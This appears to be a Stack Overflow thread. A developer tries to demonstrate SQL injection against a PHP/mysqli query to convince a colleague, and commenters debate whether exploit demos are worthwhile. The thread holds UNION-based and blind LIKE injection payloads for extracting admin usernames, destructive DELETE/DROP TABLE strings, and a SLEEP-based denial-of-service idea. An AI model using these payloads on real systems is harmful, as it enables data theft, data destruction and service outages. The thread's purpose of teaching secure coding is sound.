# SQL Injection with MySQL (a fun challenge)

Tags: php, mysql, sql, sql-injection

A fellow developer has just introduced an SQL injection vulnerability on a website I maintain, and I want to show how easily it can be exploited; but there are a couple of issues.

Taking the SQL, which is roughly:

```
SELECT
    c.id,
    c.name,
    c.start
FROM
    course AS c
WHERE
    MONTH(c.start) = $_GET['month']
ORDER BY
    c.start
```

If I set `$_GET['month']` to:

```
13 UNION SELECT 1, username, 3 FROM admin
```

That would run the query:

```
SELECT
    c.id,
    c.name,
    c.start
FROM
    course AS c
WHERE
    MONTH(c.start) = 13 UNION SELECT 1, username, 3 FROM admin
ORDER BY
    c.start
```

Which would work, if the ORDER BY didn't include the `c.` table alias. Instead it results in the error:

```
Table 'c' from one of the SELECTs cannot be used in field list
```

---

## Alias

Adding an `c` ALIAS to the `admin` does not make any difference either:

```
13 UNION SELECT 1, c.username, 3 FROM admin AS c
```

---

## Commenting

I have tried using `--` to comment out the ORDER BY, but this does not work because it's on a new line:

```
13 UNION SELECT 1, c.username, 3 FROM admin AS c --
```

Likewise `/*` won't work, because I can't add the final `*/`:

```
13 UNION SELECT 1, c.username, 3 FROM admin AS c /*
```

---

## Split queries

It also seems that `mysqli_prepare()` does not like `;` anywhere in the query - so a DROP, DELETE, or TRUNCATE would result in an SQL syntax error:

```
13; DELETE FROM admin;
```

---

## A solution

At the moment the only thing I can think of doing is adding to the WHERE clause, so the attacker can get a yes/no response (some records or no records), like the following - but this is less satisfying than seeing records appear on screen :-)

```
SELECT
    c.id,
    c.name,
    c.start_estimate
FROM
    thr_course_term AS c
WHERE
    MONTH(c.start_estimate) = 13 OR 1 = (SELECT 1 FROM thr_admin WHERE username LIKE "crai%")
ORDER BY
    c.start_estimate;
```

---

## Source code

The SQL is being run in PHP with `mysqli`, the rough code being:

```
<?php

$month = '13 UNION SELECT 1, username, 3 FROM admin'; // from $_GET['month']

$sql = 'SELECT
            c.id,
            c.name,
            c.start
        FROM
            course AS c
        WHERE
            MONTH(c.start) = ' . $month . '
        ORDER BY
            c.start';

$link = mysqli_connect('localhost', 'username', 'password', 'database');

$statement = mysqli_prepare($link, $sql);

if (!$statement) {

    echo $link->error;

} else {

    // Skip the bind_param bit

    $result = $statement->execute();
    $result = $statement->get_result();

    while ($row = mysqli_fetch_assoc($result)) {
        print_r($row);
    }

}

?>
```

Comment: Nope, I know how to prevent, I'm trying to show how to exploit :-)

Comment: `1 or 1=1` would return everything, no?

Comment: @AlexK. It would but, I'm trying to append the admin usernames onto the end of the results :-)

Comment: @FranzGleichmann np, this one is defiantly a play thing :-)

Comment: your "rough" code should probably include what `$sql` is.

Comment: All in that line you could terminate the first query, inject a malicious query, then continue the last query.  Kind of like the `--` comment injection, but with more queries.

Comment: @Fred-ii- good point, it's technically the first query shown, but I'm trying to avoid making this a copy/paste resource of how not to do things :-)

Comment: what you shown us is a pure mysql query, rather than what syntax is actually used, if you're using hard code values and/or variables or placeholders and could have a bearing on the outcome of answers/responses.

Comment: well, if the attacker would somehow know  that the `as c` is used somewhere (probably if the first error would be displayed), he could simply name the table in your union select-attack: `13 UNION SELECT 1, c.username, 3 FROM admin as c` (and since most table aliases are one single character, this would be guessed with worst-case 26 tries)

Comment: `1;DROP TABLE users;SELECT c.start FROM course AS c`

Comment: @FranzGleichmann I thought I could use a second alias as well, but it didn't seem to work (I'll update the question in a moment, just having a quick lunch)

Comment: @David I'll test in a bit, but I think the ; does not work in `mysqli_prepare`

Comment: @Fred-ii- I've updated the rough code to show how $sql is created (more or less).

Comment: @CraigFrancis Thank you Craig ;-)

Comment: @FranzGleichmann I've just updated the question to include the alias example as well (when I tried it originally I was sure that would work.)

Comment: If using tool properly, than you will be safe from such things.

Comment: @Justinas This is to show a fellow developer what would happen when we don't use the tools correctly... but the demo isn't as effective as I'd like :-)

Comment: @CraigFrancis I personally don't think you need to create new question just to show that you have security issues in your code. I assume you also have direct access to uploaded files, XSS issues and so on

Comment: @Justinas Please read the question again... I don't have this vulnerability, I caught it before a junior developer uploaded it to Live (during a code review), but I wanted to show why this is a problem, but I can't seem to get a good demonstration with this particular situation :-)

Comment: I think `; -- ` solves your problem ?!?!

Comment: @Strawberry - nope, sorry, `mysqli_prepare()` does not like ";" anywhere in the query... this is why it's proving harder to exploit than I thought.

Comment: OK, but what about `--`

Comment: @Strawberry - nope, "--" only comments to the end of the line, where this query was written with the ORDER BY on a new line... multi-line comments don't work either, because you can't add the final `*/` :-)

Comment: @CraigFrancis yes - but you could write it out on one line for the purpose of the demonstration, right?

Comment: @Strawberry I could remove the newline, but the point is that I don't want to make any edits to the source code... at the moment they believe their code is close to impossible to hack (with the exception of the last example, where the developer has said "who would do one character at a time").

Comment: Well, in that case I'm going to duck this one, and refer you and your colleagues to YCS's response.

Comment: @Strawberry - It is an interesting challenge though, so I would appreciate your thoughts on a possible work around... as in, how to actually break this, considering that SQLi is supposed to be such a dangerous thing :-)

Comment: While not as useful, it might be very easy to execute a DoS attack on the MySQL instance. `SLEEP()` or `BENCHMARK()`?

Comment: @Pete TBH, I think this might be one of the most effective demonstrations, 1000 requests which do a SLEEP(300); while it does not extract or damage any data, it does effect the website. Thanks for the suggestion (and if no one can think of anything better, I think this is perhaps the best answer)

Answer (score 3):

There is no point actually in demonstrating whatever exploit techniques.

On the one hand, the number of possible exploits is infinite. You can flood entire Stack Overflow with examples. *However none of them will add anything to protecting techniques.* You see, the protecting rules are short and clear. There is no point in memorizing hundreds of possible exploits to protect your site. All you need is to learn a couple of rules:

1. All data literals should be added through placeholders.
2. All other query parts have to be white-listed.

That's all.

On the other hand, to *demonstrate* the danger, old Bobby Tables' example is enough. If this one didn't convince you, I doubt that any number of other exploit examples will do.

Comment: I think that OP is illustrating that Bobby Tables exploit *wont* work on this setup, but wants to show a exploit that *will* work in this scenario. I agree that the rationale is somewhat un-needed, but it's not a simple copy of Bobby Tables-type exploit

Comment: well, as OP mentioned attacking via `;` doesn't work, so ol' bobby tables is not an example in this particular case. most basic attack vectors won't work, and i'd think that showing (and explaining) some more complex attacks to newbies would definitely teach them how tricky some malicious users can be, which may lead them to actually *think* about why and how to make their code safe

Comment: This is not an answer -- and yet I think it is the correct answer. Upvoting the awesomeness :-)

Comment: **It doesn't freaking matter!** The nitty-gritty details of the particular txploit add nothing to security. It's just stupid to base your protection on one particular example. If Bobby tables example is not enough for you then you are busted already. I see no point in nitpicking on it.

Comment: I just thought this might be a good fun question to answer... especially as my understanding of how to exploit SQL Injection is a bit harder than I originally thought.

Comment: But it's not unreasonable to demonstrate a way in which an exploit might occur.

Comment: @FranzGleichmann you see, to make a good protection you can be absolutely ignorant about whatever techniques. It's just a waste of time. You can spend years learning some, but NONE will help you to make your site more secure. This trivia stuff is irrelevant to protection. And even harmful because it can make you focus on unnecessary details. But yeah, people always get impressed when shown silly tricks, so this question will gain some popularity, no doubt

Comment: @your-common-sense - At the moment the developer does not believe their code is vulnerable, only because I can't think of a way to easily exploit it (with the exception of extracting the records one character at a time).

Comment: YourCommonSense, @CraigFrancis raises a very good point with this question, in that you state yourself `It's just stupid to base your protection on one particular example` - it also holds it's just stupid to base your correction on one example (Bobby Tables). Yes Bobby is a good *general* example but when Craig wants to teach to a co-worker **why** their method is bad (because we all agree it is), he should have more to go on than "Because YourCommoSense says so". To illustrate this point (as attempted with this Q) reinforces the point. Your obsession that 'details don't matter' does not help.

Comment: Think of it as a challenge, can you inject into or abuse the above SQL query, *even though it is not using the recommended best practise*?